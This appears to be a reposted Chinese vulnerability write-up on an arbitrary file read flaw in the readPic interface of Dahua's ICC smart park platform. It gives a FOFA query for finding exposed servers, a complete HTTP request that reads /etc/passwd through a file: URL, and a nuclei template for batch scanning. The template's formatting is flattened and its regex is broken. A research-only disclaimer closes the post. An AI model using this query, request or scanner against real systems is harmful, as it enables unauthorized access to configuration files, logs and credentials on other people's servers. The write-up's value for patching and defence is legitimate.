一、漏洞描述
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台的 "readpic" 接口存在一个任意文件读取漏洞,恶意攻击者可通过文件读取漏洞进行访问和读取系统中的文件,包括配置文件、日志和其他敏感数据,从而利用攻击。
二、漏洞复现
1、fofa语法查找:body="*客户端会小于800*"
2、登录页面如下:
3、使用下述POC进行复
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/2
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
If-None-Match: W/"63ba2750-93e"
Te: trailers
4、访问系统抓包进行拦截数据包,修改请求包,使用POC进行漏洞测试,响应包中则会返回敏感数据
5、批量漏洞测试脚本
nuclei:
id: dahua-icc-readpic-anyfileread
info:
name: 大华ICC readpic任意文件读取漏洞
author: fgz
severity: high
description: |
2021年大华全新发布的ICC架构下的基础停车业务系统,基于硬件+平台+服务能力,依托集中化管控模式,提供中大型园区集团化管理、多社区停车场联网等项目的集成应用,打造集停车场管理、运营和生态于一体的赋能平台,实现降本、增收、提效。大华ICC智能物联综合管理平台存在任意文件读取漏洞,会造成敏感信息泄露。
tags: 2023,dahua,fileread
metadata:
max-request: 2
fofa-query: body="*客户端会小于800*"
verified: true
http:
method: GET
path:
"{{BaseURL}}/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd"
matchers:
type: regex
part: body
regex:
.*?:[0-9]*:[0-9]*:" :
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】大华智能物联ICC综合管理平台readpic任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论